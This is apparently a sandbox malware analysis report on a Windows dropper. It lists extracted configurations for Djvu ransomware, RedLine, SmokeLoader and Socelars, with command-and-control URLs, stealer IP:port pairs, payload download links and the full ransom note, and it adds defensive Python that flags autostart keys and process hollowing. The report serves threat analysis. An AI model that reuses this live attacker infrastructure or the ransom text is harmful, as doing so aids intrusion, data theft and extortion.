Analysis
  max time kernel: 147s
  max time network: 155s
  platform: windows10-2004_x64
  resource: win10v2004-en-20220113
  submitted: 12-03-2022 19:40
Static task: static1
Behavioral task: behavioral1
  Sample: 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
  Resource: win7-20220311-en
Behavioral task: behavioral2
  Sample: 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
  Resource: win10v2004-en-20220113
General
  Target: 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
  Size: 4.0MB
  MD5: 8dcf7d03311c30ff6902530f95f77b36
  SHA1: b5f441c49823cbd4f253163d233452927df777d8
  SHA256: 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135
  SHA512: 7b605bef4c177406606f6abb4baf1781525aa150b5dab8b129bd52fdc6f4f485cea589fe93161d4c353c947fe2214ea84b1329d5212c73e410fccbe20f4cf6b4
Malware Config
Extracted: socelars
  http://www.iyiqian.com/
  http://www.xxhufdc.top/
  http://www.uefhkice.xyz/
  http://www.wygexde.xyz/
Extracted: smokeloader
  2020
  http://conceitosseg.com/upload/
  http://integrasidata.com/upload/
  http://ozentekstil.com/upload/
  http://finbelportal.com/upload/
  http://telanganadigital.com/upload/
Extracted: redline
  ruzki12_03
  176.122.23.55:11768
  auth_value: c51ddc8008e8581a01cec6e8291c5530
Extracted: djvu
  http://fuyt.org/test3/get.php
  extension: .xcbg
  offline_id: y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
  payload_url:
    http://zerit.top/dl/build2.exe
    http://fuyt.org/files/1/build3.exe
  ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn
Extracted: redline
  ruzkida
  185.11.73.55:22201
  auth_value: 000938fe0d697ca6a3b6cee46ba02ff3
Signatures
-
Detected Djvu ransomware 4 IoCs
Processes:
  resource                                                                        yara_rule
  behavioral2/memory/6400-312-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
  behavioral2/memory/6400-350-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
  behavioral2/memory/6400-352-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
  behavioral2/memory/6400-356-0x0000000000400000-0x0000000000537000-memory.dmp  family_djvu
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
  resource                                                                        yara_rule
  behavioral2/memory/5548-244-0x0000000000640000-0x0000000000790000-memory.dmp  family_redline
  behavioral2/memory/5548-256-0x0000000000640000-0x0000000000790000-memory.dmp  family_redline
  behavioral2/memory/5548-257-0x0000000000640000-0x0000000000790000-memory.dmp  family_redline
  behavioral2/memory/5548-265-0x0000000000640000-0x0000000000790000-memory.dmp  family_redline
  behavioral2/memory/5548-295-0x0000000000640000-0x0000000000790000-memory.dmp  family_redline
  behavioral2/memory/6380-311-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
  behavioral2/memory/6192-332-0x0000000000400000-0x0000000000420000-memory.dmp  family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
  resource                                                 yara_rule
  C:\Users\Admin\AppData\Local\Temp\Installation.exe       family_socelars
  C:\Users\Admin\AppData\Local\Temp\Installation.exe       family_socelars
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
OnlyLogger Payload 3 IoCs
Processes:
  resource                                                                        yara_rule
  behavioral2/memory/3320-156-0x0000000000AE0000-0x0000000000B10000-memory.dmp  family_onlylogger
  behavioral2/memory/3320-157-0x0000000000400000-0x00000000009C0000-memory.dmp  family_onlylogger
  behavioral2/memory/5688-279-0x0000000000610000-0x0000000000654000-memory.dmp  family_onlylogger
Blocklisted process makes network request 5 IoCs
Processes:
  flow  pid   process
  250   5308  powershell.EXE
  253   5308  powershell.EXE
  261   5308  powershell.EXE
  266   6148  rundll32.exe
  270   6148  rundll32.exe
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 48 IoCs
Processes:
  pid   process
  2556  Files.exe
  3320  Install.exe
  5004  KRSetp.exe
  4468  jg3_3uag.exe
  1964  File.exe
  1880  Folder.exe
  4932  Installation.exe
  4864  pzyh.exe
  1252  pub2.exe
  4708  Info.exe
  3364  jfiag3g_gg.exe
  5060  jfiag3g_gg.exe
  5140  RK_4rgTt5CcW3iNxDT6xO9bL.exe
  5148  LuC7opz56ZHv9DMKAzniWXla.exe
  5212  RxWV8a03ZV04XB88tc2CXbRj.exe
  5252  Gzkt5mHpxF1v1F6ko7n6Ojln.exe
  5308  powershell.EXE
  5316  8yNuAlksxt9ERCQBLnTf5R7s.exe
  5408  3C5chxgmdIM7FCOvWctXQCVO.exe
  5504  ftGHhdmXOThAq7aPthuyzF9H.exe
  5520  PGrgYrmjIUuPTUnxq9jnhp_9.exe
  5512  HxMqtYZIUVTsFBvCoEA3Pki_.exe
  5532  find.exe
  5548  thSjL5N0VAxIgAXhHP6f09aM.exe
  5536  ZQfEwTalmYFjc4TLiZPAYIzG.exe
  5600  QwtjZdfAu0PgtINFi4Nvj66n.exe
  5640  lx0psHagf6RnnGkhZ0Fowal4.exe
  5648  AMmh7Hp1kuB7JaUBXLLtucDo.exe
  5672  zhD7lRTUvJmwo8erfpdnVTWv.exe
  5680  4E1sEd5y60BTJLCX9pPJHvn6.exe
  5688  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  5696  aE5gGpDGF09P287uBSM8LvUs.exe
  5704  OXTwCzYYERQoTolMsvuosWem.exe
  5720  z63VCPkRi8gB3YlO5uw17UaM.exe
  3936  34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
  6264  Install.exe
  6400  zhD7lRTUvJmwo8erfpdnVTWv.exe
  6192  lx0psHagf6RnnGkhZ0Fowal4.exe
  5188  Install.exe
  5832  dada.exe
  6140  dada.exe
  2328  build.exe
  2456  build.exe
  5208  bkkimcju.exe
  7024  irrptjqb.exe
  224   Accostarmi.exe.pif
  6912  Lxjwaytgkwrfchptbandzip.exe
  4428  MoUSO.exe
Modifies Windows Firewall 1 TTPs
-
Processes:
  resource                                            yara_rule
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe    upx
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe    upx
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe    upx
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe    upx
Processes:
  resource                                                                        yara_rule
  C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe                                  vmprotect
  C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe                                  vmprotect
  behavioral2/memory/4468-142-0x0000000000400000-0x0000000000651000-memory.dmp  vmprotect
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                              process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Install.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  PGrgYrmjIUuPTUnxq9jnhp_9.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   PGrgYrmjIUuPTUnxq9jnhp_9.exe
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description        ioc
  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation
  (the same value is queried by each of the 14 processes below)
  ZQfEwTalmYFjc4TLiZPAYIzG.exe
  Gzkt5mHpxF1v1F6ko7n6Ojln.exe
  OXTwCzYYERQoTolMsvuosWem.exe
  7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
  Info.exe
  build.exe
  Folder.exe
  ftGHhdmXOThAq7aPthuyzF9H.exe
  RxWV8a03ZV04XB88tc2CXbRj.exe
  bkkimcju.exe
  Install.exe
  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  Files.exe
  RK_4rgTt5CcW3iNxDT6xO9bL.exe
Loads dropped DLL 24 IoCs
Processes:
  pid   process                       entries
  1252  pub2.exe                      1
  3340  rUNdlL32.eXe                  1
  5148  LuC7opz56ZHv9DMKAzniWXla.exe  10
  5316  8yNuAlksxt9ERCQBLnTf5R7s.exe  10
  5308  powershell.EXE                2
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
  description      ioc                                                                                                                                                          process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"                       pzyh.exe
  Key created      \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run                                                    msedge.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\RxWV8a03ZV04XB88tc2CXbRj.exe"  RxWV8a03ZV04XB88tc2CXbRj.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\ftGHhdmXOThAq7aPthuyzF9H.exe"  ftGHhdmXOThAq7aPthuyzF9H.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unyridm = "\"C:\\Users\\Admin\\bkkimcju.exe\""      OXTwCzYYERQoTolMsvuosWem.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\""  ZQfEwTalmYFjc4TLiZPAYIzG.exe
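The six autostart writes above are the kind of artefact an analyst turns into a host check: every value points into a location the infected user can write to, two of them use RunOnce rather than Run, and one target (haleng.e) does not even carry an executable extension. The following Python is an added example, not part of this sandbox report and not code from any of the listed malware families. It parses lines in the report's `Set value (str) <key>\<name> = "<data>" <process>` shape, unescapes the value, extracts the image path and flags the entry when the path is user-writable, sits in a Temp directory, lives under RunOnce, or has an unusual extension. The first five sample lines are copied from this report; the sixth (a SecurityHealth entry launched from system32 by explorer.exe) is constructed as a benign control. The path and extension heuristics are the example's own assumptions, not a Triage rule.

```python
import ntpath
import re

# Sample lines in the report's "Set value (str) <key>\<name> = "<data>" <process>" shape.
# The first five are copied from this report; the sixth is a constructed benign entry.
SAMPLE_AUTOSTART = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\RxWV8a03ZV04XB88tc2CXbRj.exe" RxWV8a03ZV04XB88tc2CXbRj.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\ftGHhdmXOThAq7aPthuyzF9H.exe" ftGHhdmXOThAq7aPthuyzF9H.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unyridm = "\"C:\\Users\\Admin\\bkkimcju.exe\"" OXTwCzYYERQoTolMsvuosWem.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\"" ZQfEwTalmYFjc4TLiZPAYIzG.exe',
    # constructed benign control: a Windows component registered from a system path
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = "C:\\Windows\\system32\\SecurityHealthSystray.exe" explorer.exe',
]

AUTOSTART_RE = re.compile(
    r'^Set value \(\w+\) (?P<key>\\REGISTRY\\.*?\\(?P<hive_key>Run|RunOnce))'
    r'\\(?P<name>[^\\ ]+) = "(?P<data>.*)" (?P<process>\S+)$',
    re.IGNORECASE,
)

# Heuristics (assumptions of this example): anything under a user profile or ProgramData
# is writable without admin rights; Temp directories are classic dropper staging areas.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users\\[^\\]+|programdata)\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
EXEC_EXT = {".exe", ".dll", ".cmd", ".bat", ".vbs", ".js", ".ps1", ".scr",
            ".lnk", ".msi", ".com", ".pif", ".hta", ".wsf"}


def _unescape(data: str) -> str:
    """Undo the report's escaping of backslashes and embedded quotes."""
    return data.replace("\\\\", "\\").replace('\\"', '"')


def image_path(command: str) -> str:
    """Return the executable part of a Run-key command line (quoted or first token)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def parse_autostart(line: str):
    """Parse one 'Set value' line into its parts, or None if it is not a Run/RunOnce write."""
    m = AUTOSTART_RE.match(line)
    if not m:
        return None
    return {
        "key": m["key"],
        "hive_key": m["hive_key"],
        "name": m["name"],
        "command": _unescape(m["data"]),
        "process": m["process"],
    }


def assess(entry: dict) -> list:
    """Return the reasons an autostart entry looks suspicious (empty list = nothing flagged)."""
    path = image_path(entry["command"])
    reasons = []
    if USER_WRITABLE.match(path):
        reasons.append("user_writable_path")
    if TEMP_DIR.search(path):
        reasons.append("temp_dir")
    if entry["hive_key"].lower() == "runonce":
        reasons.append("runonce")  # one-shot: typical of a stage that reboots itself into place
    ext = ntpath.splitext(path)[1].lower()
    if ext not in EXEC_EXT:
        reasons.append("unusual_extension:" + ext)
    return reasons


def suspicious_autostarts(lines) -> list:
    """Parse all lines and keep only the autostart entries with at least one reason."""
    out = []
    for line in lines:
        entry = parse_autostart(line)
        if entry is None:
            continue
        reasons = assess(entry)
        if reasons:
            out.append({**entry, "path": image_path(entry["command"]), "reasons": reasons})
    return out


if __name__ == "__main__":
    for row in suspicious_autostarts(SAMPLE_AUTOSTART):
        print(f'{row["process"]:32} {row["hive_key"]:8} {row["name"]:12} {row["path"]}  {", ".join(row["reasons"])}')
```

Run against the sample, all five report entries are returned and the constructed SecurityHealth line is dropped. On a live host the same `assess` logic applies to values read from HKCU and HKLM `...\CurrentVersion\Run` and `RunOnce` (including the WOW6432Node view, which is where pzyh.exe wrote), which is the practical follow-up to this section.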
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
  description        ioc                                                                          process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  PGrgYrmjIUuPTUnxq9jnhp_9.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  jg3_3uag.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  230   ipinfo.io
  232   ipinfo.io
  239   ipinfo.io
  240   ipinfo.io
  14    ip-api.com
  18    ipinfo.io
  19    ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
  resource                                                yara_rule
  C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe      autoit_exe
  C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe      autoit_exe
Drops file in System32 directory 1 IoCs
Processes:
  description   ioc                                       process
  File created  C:\Windows\system32\GroupPolicy\gpt.ini  Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
  pid   process
  5548  thSjL5N0VAxIgAXhHP6f09aM.exe
  5648  AMmh7Hp1kuB7JaUBXLLtucDo.exe
Suspicious use of SetThreadContext 5 IoCs
Processes:
  description                            pid   process                       target process
  PID 5672 set thread context of 6400    5672  zhD7lRTUvJmwo8erfpdnVTWv.exe  zhD7lRTUvJmwo8erfpdnVTWv.exe
  PID 5520 set thread context of 6380    5520  PGrgYrmjIUuPTUnxq9jnhp_9.exe  AppLaunch.exe
  PID 5640 set thread context of 6192    5640  lx0psHagf6RnnGkhZ0Fowal4.exe  lx0psHagf6RnnGkhZ0Fowal4.exe
  PID 7024 set thread context of 2160    7024  irrptjqb.exe                  svchost.exe
  PID 5536 set thread context of 6908    5536  ZQfEwTalmYFjc4TLiZPAYIzG.exe  MSBuild.exe
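Each `set thread context` row pairs a source process with the process whose execution it redirects, which is the hallmark of process hollowing: the loader starts a suspended copy of itself or of a signed Microsoft binary (AppLaunch.exe, svchost.exe, MSBuild.exe here), overwrites its image and resumes it. The useful follow-up is to join these rows with the memory-dump YARA matches elsewhere on this page: where the target PID also carries a family rule hit, the hollowed process is where the real payload runs, and that PID is the one to dump or to take a network timeline from. The block below is an added example, not from this report or from Triage. The sample rows are copied from this report; the set of Microsoft binaries treated as "hollowed host" is an assumption of the example.

```python
import re

# Rows copied from this report's "Suspicious use of SetThreadContext" table.
CTX_LINES = [
    "PID 5672 set thread context of 6400 5672 zhD7lRTUvJmwo8erfpdnVTWv.exe zhD7lRTUvJmwo8erfpdnVTWv.exe",
    "PID 5520 set thread context of 6380 5520 PGrgYrmjIUuPTUnxq9jnhp_9.exe AppLaunch.exe",
    "PID 5640 set thread context of 6192 5640 lx0psHagf6RnnGkhZ0Fowal4.exe lx0psHagf6RnnGkhZ0Fowal4.exe",
    "PID 7024 set thread context of 2160 7024 irrptjqb.exe svchost.exe",
    "PID 5536 set thread context of 6908 5536 ZQfEwTalmYFjc4TLiZPAYIzG.exe MSBuild.exe",
]

# Memory-dump YARA matches copied from the report's payload sections (one line per PID/family).
YARA_LINES = [
    "behavioral2/memory/6400-312-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu",
    "behavioral2/memory/5548-244-0x0000000000640000-0x0000000000790000-memory.dmp family_redline",
    "behavioral2/memory/6380-311-0x0000000000400000-0x0000000000420000-memory.dmp family_redline",
    "behavioral2/memory/6192-332-0x0000000000400000-0x0000000000420000-memory.dmp family_redline",
    "behavioral2/memory/3320-157-0x0000000000400000-0x00000000009C0000-memory.dmp family_onlylogger",
]

CTX_RE = re.compile(r"^PID (\d+) set thread context of (\d+) (\d+) (\S+) (\S+)$")
YARA_RE = re.compile(r"memory/(\d+)-\d+-0x[0-9A-Fa-f]+-0x[0-9A-Fa-f]+-memory\.dmp (\S+)")

# Signed Microsoft binaries commonly used as hollowing hosts (assumption; extend as needed).
KNOWN_HOSTS = {
    "applaunch.exe", "svchost.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe",
    "installutil.exe", "aspnet_compiler.exe", "vbc.exe", "cvtres.exe",
}


def families_by_pid(yara_lines) -> dict:
    """Map each PID that has a memory-dump YARA hit to the set of matching family rules."""
    out = {}
    for line in yara_lines:
        m = YARA_RE.search(line)
        if m:
            out.setdefault(int(m.group(1)), set()).add(m.group(2))
    return out


def classify(source: str, target: str) -> str:
    """Label the injection shape from the two image names."""
    if source.lower() == target.lower():
        return "self_hollowing"      # unpacking stub resumes a fresh copy of its own image
    if target.lower() in KNOWN_HOSTS:
        return "hollowed_host"       # payload hidden behind a signed Microsoft image
    return "cross_process"


def correlate(ctx_lines, yara_lines) -> list:
    """Join SetThreadContext rows with YARA memory hits on the *target* PID."""
    fam = families_by_pid(yara_lines)
    rows = []
    for line in ctx_lines:
        m = CTX_RE.match(line)
        if not m:
            continue
        src_pid, dst_pid, _, src, dst = m.groups()
        dst_pid = int(dst_pid)
        rows.append({
            "source_pid": int(src_pid), "source": src,
            "target_pid": dst_pid, "target": dst,
            "kind": classify(src, dst),
            "families": sorted(fam.get(dst_pid, ())),
        })
    return rows


def payload_pids(rows) -> list:
    """PIDs worth dumping first: hollowed targets that already carry a family hit."""
    return [r["target_pid"] for r in rows if r["families"]]


if __name__ == "__main__":
    for r in correlate(CTX_LINES, YARA_LINES):
        print(f'{r["source_pid"]:>5} {r["source"]:30} -> {r["target_pid"]:>5} {r["target"]:30} '
              f'{r["kind"]:15} {", ".join(r["families"]) or "-"}')
```

On this report the join puts family_djvu on 6400 (the hollowed copy of zhD7lRTUvJmwo8erfpdnVTWv.exe) and family_redline on 6380 (AppLaunch.exe hollowed by PGrgYrmjIUuPTUnxq9jnhp_9.exe) and 6192; the svchost.exe and MSBuild.exe targets have no rule hit on the page, so they would be the next dumps to inspect by hand rather than something to dismiss.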
Drops file in Program Files directory 2 IoCs
Processes:
  description                   ioc                                                                                                  process
  File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220312194133.pma                    setup.exe
  File created                  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\08a81096-2458-4d09-bc32-1cdd20f508f6.tmp  setup.exe
Drops file in Windows directory 1 IoCs
Processes:
  description   ioc                                          process
  File created  C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job     schtasks.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
Processes:
  pid   pid_target  process       target process
  2920  3320        WerFault.exe  Install.exe
  944   3340        WerFault.exe  rUNdlL32.eXe
  1568  3320        WerFault.exe  Install.exe
  3228  3320        WerFault.exe  Install.exe
  3316  3320        WerFault.exe  Install.exe
  4064  3320        WerFault.exe  Install.exe
  3840  3320        WerFault.exe  Install.exe
  3392  3320        WerFault.exe  Install.exe
  4796  3320        WerFault.exe  Install.exe
  4948  5532        WerFault.exe  gcZHL1UuAAZsKYs16SSxBhPd.exe
  4672  5680        WerFault.exe  4E1sEd5y60BTJLCX9pPJHvn6.exe
  6248  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  6164  5720        WerFault.exe  z63VCPkRi8gB3YlO5uw17UaM.exe
  6936  5532        WerFault.exe  gcZHL1UuAAZsKYs16SSxBhPd.exe
  6364  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  6436  5720        WerFault.exe  z63VCPkRi8gB3YlO5uw17UaM.exe
  6444  5680        WerFault.exe  4E1sEd5y60BTJLCX9pPJHvn6.exe
  6892  5704        WerFault.exe  OXTwCzYYERQoTolMsvuosWem.exe
  6832  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  400   5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  6528  5208        WerFault.exe  bkkimcju.exe
  4948  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  6436  5408        WerFault.exe  3C5chxgmdIM7FCOvWctXQCVO.exe
  6888  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  6656  5408        WerFault.exe  3C5chxgmdIM7FCOvWctXQCVO.exe
  4916  7024        WerFault.exe  irrptjqb.exe
  6348  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  2788  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  2500  5688        WerFault.exe  k3wOXzGlwzQprfZ7dKwqK6sN.exe
  5676  3320        WerFault.exe  Install.exe
  7140  3320        WerFault.exe  Install.exe
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description     ioc                                               process
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Lxjwaytgkwrfchptbandzip.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  pub2.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  pub2.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  pub2.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Lxjwaytgkwrfchptbandzip.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Lxjwaytgkwrfchptbandzip.exe
Checks processor information in registry 2 TTPs 27 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description           ioc                                                                                     process
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString    3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier       3C5chxgmdIM7FCOvWctXQCVO.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor                          3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                        3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString    8yNuAlksxt9ERCQBLnTf5R7s.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier             34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                        3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision  3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status          3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1  3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString    3C5chxgmdIM7FCOvWctXQCVO.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                        powershell.EXE
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString    powershell.EXE
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision        3C5chxgmdIM7FCOvWctXQCVO.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                        LuC7opz56ZHv9DMKAzniWXla.exe
  Key value enumerated  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                        3C5chxgmdIM7FCOvWctXQCVO.exe
  Key opened            \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0                        34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet             3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                   3C5chxgmdIM7FCOvWctXQCVO.exe
  Key value queried     \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data     3C5chxgmdIM7FCOvWctXQCVO.exe
